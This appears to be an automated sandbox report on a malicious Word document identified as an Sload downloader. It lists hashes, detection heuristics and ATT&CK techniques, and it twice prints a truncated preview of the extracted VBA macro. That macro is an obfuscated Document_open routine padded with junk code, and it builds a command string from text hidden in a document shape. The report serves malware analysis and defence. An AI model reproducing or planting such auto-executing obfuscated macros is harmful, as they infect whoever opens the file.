Office (OLE) malware analysis — malicious · aef352b338ec1651

MALICIOUS

Office (OLE)

140.6 KB Created: 2018-11-29 07:17:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 5787baba8956f5a3f04e0632ec06b6b6 SHA-1: 3ca9ddf76ee96f17e67414fbaf05d2ba6c3dbe75 SHA-256: aef352b338ec165156c57569386f24e9c90e82eb2ee9a4b8fe72500cb00f6e54

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro that executes a Document_Open auto-execution routine. This routine is designed to download and execute a second-stage payload using obfuscated PowerShell commands. The reconstructed PowerShell command includes multiple URLs, suggesting a downloader functionality. The ClamAV detection 'Doc.Downloader.Sload-6799025-0' further supports this assessment.

Heuristics 6

ClamAV: Doc.Downloader.Sload-6799025-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sload-6799025-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7058 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7058 bytes
SHA-256: `0f8b86af31e902f14cfa07e0a12e778f14510e8f7e8ac5c36d4c34815ed85462`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "UYbPCcFPJZvaFI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next ijGNzKO = (wsKJOTFqa - Oct(RPztJGn) * PWBLHPV - Sgn(313530499) - 209636702 + Fix(qKlbiGKn) + 1451831359 + 229791649 / 305146697 / suEqDXdoW) Select Case aXvrumlvo Case 122503343 RAQsphqj = CLng(145217894) EfUiHGQL = Int(RrSrjOjqM) Case 159802944 bubHb = Hex(303762076) wNqnFAOV = CStr(286994330 * CByte(NnfUjqA)) End Select On Error Resume Next JZNDlj = (KhfTHDN - Oct(SmSGd) * bbLzt - Sgn(49388683) - 137235888 + Fix(kYBjrTzfi) + 369337239 + 131574510 / 30173373 / uGnMBmFcu) Select Case FKLhwBFs Case 184830645 TwGRY = CLng(76179982) EnHMmYChV = Int(ksUPOqn) Case 315897501 jlBdYNr = Hex(20172430) zzWnptBp = CStr(253828580 * CByte(TlIAcdU)) End Select Set mEGTV = Shapes("dYIZNpSu") On Error Resume Next XfCFtMHV = (JimJEwr - Oct(BJsoQuAo) * XlTRX - Sgn(216258471) - 102604055 + Fix(tvpaH) + 1763785239 + 15921856 / 108747270 / VYmOLp) Select Case RaNErHl Case 12032716 opVBLm = CLng(329769239) FLACOui = Int(YvYbCpLwu) Case 2528071 TKMlKnKSl = Hex(214460818) IjaPJA = CStr(267215709 * CByte(CjiOTLM)) End Select On Error Resume Next JYXYb = (SRkOaq - Oct(zztAIJ) * CCqwFkPkJ - Sgn(92857578) - 336355596 + Fix(HsjBZp) + 1350294559 + 334460696 / 273252221 / WiSFnQbEH) Select Case vqCHhbSqD Case 218268229 WOPiX = CLng(108536855) TLoKAMjHd = Int(wzJEG) Case 62418876 QqbUwW = Hex(194670473) IizTDWPzi = CStr(245458497 * CByte(BkqpbazRt)) End Select fQkjDIsXL = "" + ihziTJI + QFzSh + VoKPsij + AAtAFjq + mEGTV.TextFrame.TextRange.Text + nMEtiG + jODEiLB + qVzLv + rjojVj + HwwZWa On Error Resume Next kPAmQt = (wswDhNq - Oct(MKYAqar) * sHfGjzzp - Sgn(52620842) - 333137609 + Fix(MjWWGiDl) + 1550828389 + 129592295 / 316259579 / iBZzBs) Select Case FnsiIil Case 257829077 wsIvjYiwq = CLng(268894450) VmoURw = Int(wEGzzwitA) Case 128102088 NrVrN = Hex(253728573) LAdJXaH = CStr(85413440 * CByte(HSwYNLj)) End Select On Error Resume Next mQBTI = (NzRLJdBM - Oct(cGucEIWa) * YlXzJn - Sgn(276889039) - 16945576 + Fix(LKZLf) + 294764989 + 83055854 / 42014 / wEVadw) Select Case PchQNvQ Case 276190258 vXRQndVG = CLng(155970854) CNQbpPErX = Int(wzHYUuL) Case 55964035 sPtjckhv = Hex(235851819) VjPDnvP = CStr(333849654 * CByte(rAJEs)) End Select On Error Resume Next PAJMRn = (GLziKB - Oct(bkzlXAWEl) * Tubklmtmn - Sgn(172829211) - 111242294 + Fix(IHmIrjGr) + 1004325359 + 302412089 / 97001199 / wIWsu) Select Case nKPSsXL Case 193795390 YFvXahn = CLng(189117616) wPImwtaZf = Int(ldQBrSm) Case 39757254 pOPwOPi = Hex(248650586) WnVKff = CStr(301034520 * CByte(LBMVsSso)) End Select On Error Resume Next Kijpq = (hGCwQqzJv - Oct(wPIPzErR) * dzPlWIpU - Sgn(246134572) - 333126721 + Fix(FtVKiijU) + 2541624809# + 329240792 / 262027766 / aNbwfVLGq) Select Case JMrRUf Case 263152395 VLKNcDu = CLng(328285405) QUXiipFo = Int(vLKwasr) Case 275152899 ISRODjLc = Hex(185182104) NkXBhpvl = CStr(130551849 * CByte(bXlcwkcQ)) End Select On Error Resume Next jGQRABEGK = (tPXPIapPV - Oct(OFHLdCUBN) * rtjELhl - Sgn(278183966) - 211306046 + Fix(YjYIq) + 1629483079 + 90985018 / 321661499 / DaOHwhd) Select Case FowjCspwz ... (truncated)

SHA-256: 0f8b86af31e902f14cfa07e0a12e778f14510e8f7e8ac5c36d4c34815ed85462

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "UYbPCcFPJZvaFI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
      ijGNzKO = (wsKJOTFqa - Oct(RPztJGn) * PWBLHPV - Sgn(313530499) - 209636702 + Fix(qKlbiGKn) + 1451831359 + 229791649 / 305146697 / suEqDXdoW)
      Select Case aXvrumlvo
         Case 122503343
            RAQsphqj = CLng(145217894)
            EfUiHGQL = Int(RrSrjOjqM)
         Case 159802944
            bubHb = Hex(303762076)
            wNqnFAOV = CStr(286994330 * CByte(NnfUjqA))
End Select
   On Error Resume Next
      JZNDlj = (KhfTHDN - Oct(SmSGd) * bbLzt - Sgn(49388683) - 137235888 + Fix(kYBjrTzfi) + 369337239 + 131574510 / 30173373 / uGnMBmFcu)
      Select Case FKLhwBFs
         Case 184830645
            TwGRY = CLng(76179982)
            EnHMmYChV = Int(ksUPOqn)
         Case 315897501
            jlBdYNr = Hex(20172430)
            zzWnptBp = CStr(253828580 * CByte(TlIAcdU))
End Select
Set mEGTV = Shapes("dYIZNpSu")
   On Error Resume Next
      XfCFtMHV = (JimJEwr - Oct(BJsoQuAo) * XlTRX - Sgn(216258471) - 102604055 + Fix(tvpaH) + 1763785239 + 15921856 / 108747270 / VYmOLp)
      Select Case RaNErHl
         Case 12032716
            opVBLm = CLng(329769239)
            FLACOui = Int(YvYbCpLwu)
         Case 2528071
            TKMlKnKSl = Hex(214460818)
            IjaPJA = CStr(267215709 * CByte(CjiOTLM))
End Select
   On Error Resume Next
      JYXYb = (SRkOaq - Oct(zztAIJ) * CCqwFkPkJ - Sgn(92857578) - 336355596 + Fix(HsjBZp) + 1350294559 + 334460696 / 273252221 / WiSFnQbEH)
      Select Case vqCHhbSqD
         Case 218268229
            WOPiX = CLng(108536855)
            TLoKAMjHd = Int(wzJEG)
         Case 62418876
            QqbUwW = Hex(194670473)
            IizTDWPzi = CStr(245458497 * CByte(BkqpbazRt))
End Select
fQkjDIsXL = "" + ihziTJI + QFzSh + VoKPsij + AAtAFjq + mEGTV.TextFrame.TextRange.Text + nMEtiG + jODEiLB + qVzLv + rjojVj + HwwZWa
   On Error Resume Next
      kPAmQt = (wswDhNq - Oct(MKYAqar) * sHfGjzzp - Sgn(52620842) - 333137609 + Fix(MjWWGiDl) + 1550828389 + 129592295 / 316259579 / iBZzBs)
      Select Case FnsiIil
         Case 257829077
            wsIvjYiwq = CLng(268894450)
            VmoURw = Int(wEGzzwitA)
         Case 128102088
            NrVrN = Hex(253728573)
            LAdJXaH = CStr(85413440 * CByte(HSwYNLj))
End Select
   On Error Resume Next
      mQBTI = (NzRLJdBM - Oct(cGucEIWa) * YlXzJn - Sgn(276889039) - 16945576 + Fix(LKZLf) + 294764989 + 83055854 / 42014 / wEVadw)
      Select Case PchQNvQ
         Case 276190258
            vXRQndVG = CLng(155970854)
            CNQbpPErX = Int(wzHYUuL)
         Case 55964035
            sPtjckhv = Hex(235851819)
            VjPDnvP = CStr(333849654 * CByte(rAJEs))
End Select
   On Error Resume Next
      PAJMRn = (GLziKB - Oct(bkzlXAWEl) * Tubklmtmn - Sgn(172829211) - 111242294 + Fix(IHmIrjGr) + 1004325359 + 302412089 / 97001199 / wIWsu)
      Select Case nKPSsXL
         Case 193795390
            YFvXahn = CLng(189117616)
            wPImwtaZf = Int(ldQBrSm)
         Case 39757254
            pOPwOPi = Hex(248650586)
            WnVKff = CStr(301034520 * CByte(LBMVsSso))
End Select
   On Error Resume Next
      Kijpq = (hGCwQqzJv - Oct(wPIPzErR) * dzPlWIpU - Sgn(246134572) - 333126721 + Fix(FtVKiijU) + 2541624809# + 329240792 / 262027766 / aNbwfVLGq)
      Select Case JMrRUf
         Case 263152395
            VLKNcDu = CLng(328285405)
            QUXiipFo = Int(vLKwasr)
         Case 275152899
            ISRODjLc = Hex(185182104)
            NkXBhpvl = CStr(130551849 * CByte(bXlcwkcQ))
End Select
   On Error Resume Next
      jGQRABEGK = (tPXPIapPV - Oct(OFHLdCUBN) * rtjELhl - Sgn(278183966) - 211306046 + Fix(YjYIq) + 1629483079 + 90985018 / 321661499 / DaOHwhd)
      Select Case FowjCspwz
        
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.